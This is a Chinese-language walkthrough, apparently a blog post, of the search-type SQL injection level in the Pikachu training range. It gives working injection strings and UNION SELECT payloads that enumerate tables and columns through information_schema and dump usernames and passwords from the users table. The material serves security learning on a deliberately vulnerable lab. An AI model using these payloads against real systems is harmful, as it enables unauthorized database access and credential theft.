Pikachu靶场-SQL注入-搜索型注入过关步骤

Pikachu靶场-SQL注入-搜索型注入过关步骤

首先要明白MySQL数据库模糊搜索的语句,like ‘常%’、like ‘%常’、like ‘%常%’ 这个几个,这里就不详说这个语句了

判断注入点

不知道怎么写的代码以下几种语句都可以试试

这关我用的搜索型注入语句:
v%’ and -1=-1 – bbq

网上查到的搜索型注入语句:
‘and 1=1 and ‘%’=’

%’ and 1=1–’

%’ and 1=1 and ‘%’=’
单引号闭合的时候报了一个错误,这说明大概是 %xx%、xx%吧
在这里插入图片描述
直接上过程动图吧,看不清点击图片放大查看:
在这里插入图片描述

判断有多少个字段数

这关有4个,直接上动图:
在这里插入图片描述

展示显错位

在这里插入图片描述

查询当前数据库

version()查看数据库版本 ,database()查看当前数据库

v%' union select version(),database(),33 -- bbq

在这里插入图片描述

查询出数据库中的所有表

如果表多页面展示不全,可以使用 LIMIT 一页页展示,也可以使用group_concat() 拼接函数将显示的字段名包起来展示

v%' union select table_name,22,33 from information_schema.tables where table_schema=database() -- bbq

在这里插入图片描述

查询指定的表中的列名

查询出表名下一步就是,查询字段也就是列名称

v%' union select column_name,22,33 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq

在这里插入图片描述

查询数据

当经过以上步骤,已经知道了数据库名、表名、字段名,那么就可以查询我们需要的数据了

v%' union select username,password,33 from users -- bbq

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值